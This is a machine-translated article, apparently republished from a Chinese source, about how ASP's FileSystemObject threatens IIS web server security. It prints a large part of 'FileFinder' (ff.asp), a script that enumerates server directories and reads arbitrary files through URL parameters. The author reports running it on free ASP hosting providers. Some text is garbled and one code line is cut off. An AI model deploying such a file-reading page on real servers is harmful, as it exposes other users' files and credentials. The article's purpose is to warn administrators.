The threat of FSO object to IIS Web server data Security in ASP and its countermeasures _FSO special topics

Source: Internet
Author: User
Tags access database file permissions
The Scripting.FileSystemObject object is one of many COM objects provided by Scrrun.dll for Vbscript/jscript control. Scripting.FileSystemObject provides a very convenient access to text files and file directories, but it also poses a threat to IIS Web server data security.

Filefinder's code is simple, consisting of 3 functions and 30 lines of sequential code.

The most critical is the FindFiles function, which iterates through its recursive invocation and searches for the files by a specific file name extension.


function FindFiles (Strstartfolder, Strext)

Dim n

Dim Othisfolder

Dim ofolders

Dim ofiles

Dim ofolder

Dim ofile


' If the system administrator carefully sets the permissions on the file system, the following code will be wrong

' But some catalogs can still be viewed, so we simply ignore the errors in the past.

On Error Resume Next

n = 0

Response.Write "<b>searching" & Strstartfolder & "</b><br>"

Set othisfolder = G_fs.getfolder (Strstartfolder)

Set ofiles = Othisfolder.files

For each ofile in Ofiles

' If it is the specified file name extension, the output connection guides itself, but with a different command cmd

' Here is Cmd=read, the text file that reads the specified physical path

If Issuffix (Ofile.path, Strext) Then

Response.Write "<a target=_blank href= ' ff.asp?cmd=read&path=" & Server.HTMLEncode (Ofile.path) & "' > <font color= ' DodgerBlue ' > ' & Ofile.path & "</font></a><br>"

If Err = 0 Then

n = n + 1

End If

End If

Next

Set ofolders = Othisfolder.subfolders

For each ofolder in Ofolders

n = n + findfiles (Ofolder.path, Strext)

Next

FindFiles = n

End Function

The following code analyzes the parameters that follow the URL:


' Read the values of each parameter

Strcmd = UCase (Request.QueryString ("cmd"))

strpath = Request.QueryString ("path")

Strext = Request.QueryString ("ext")

Brawdata = UCase (Request.QueryString ("raw"))

' Default search. asp file

If strpath = "" Then

strpath = "."

End If

If Strext = "" Then

Strext = ". asp"

End If


' Execute different code according to different command cmd

Select Case Strcmd

Case "Find"

Response.Write FindFiles (strpath, Strext) & "file (s) found"

Case "read"

If brawdata = "T" then

Response.Write ReadTextFile (strpath)

Else

Response.Write "<pre>" & Server.HTMLEncode (ReadTextFile (strpath)) & "</pre>"

End If

Case Else

Response.Write "
End Select

As you can see from the above analysis, if you have sufficient permissions, we can find any text file on the IIS Web server through Filefinder, and we can easily view the contents of the file. For non-text files, it is possible to determine whether they exist and their path, which is sometimes extremely important for advanced hacker.

But these threats to data security are premised on the fact that users who perform ff.asp have at least the right to read directories and files. Because the default security setting for Windows NT Server after installation is that all users can "read" directories and files, it is possible to read directories and file information in a row by either the IIS default username, IUSR_servername, or any other user. Most Windows NT Server system administrators are primarily concerned about the ability of the system to run and generally do not want to change the default directory and file permissions, after all, it takes a lot of risk, and requires a lot of experience. Therefore, we can use Filefinder to check whether the security settings of the file system of the NT Server as the Web servers are secure.

The author specifically sets the permissions on the file system as an IIS Web server, but is limited to inexperience, causing many strange errors, such as: The Experimental NT Server 4.0 is not connected to an Access database. These functions are normal until file system permission changes are made.

For purely research purposes, the authors also experimented on the free ASP space I had applied for (including my personal homepage provided by CSDN), and the result was that Filefinder could run smoothly. And in the http://www2.domaindlx.com/index.html application of the personal home page does not have this problem, it can be seen that this free ASP home page provider In this regard is more serious. Although DOMAINDLX Web servers run on Windows Server, their default file system security permissions are not significantly different from NT 4.0.

Because of the limited ability of the author, we discuss this problem here. Only in this article to the domestic ASP home page provider to provide reference, I hope to be able to provide both the provider and customer data security can be helpful.

Attach: Web services that run with other similar server-side scripts, if they also provide functionality similar to Scripting.FileSystemObject for file system operations, no matter what platform should have the same problem.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.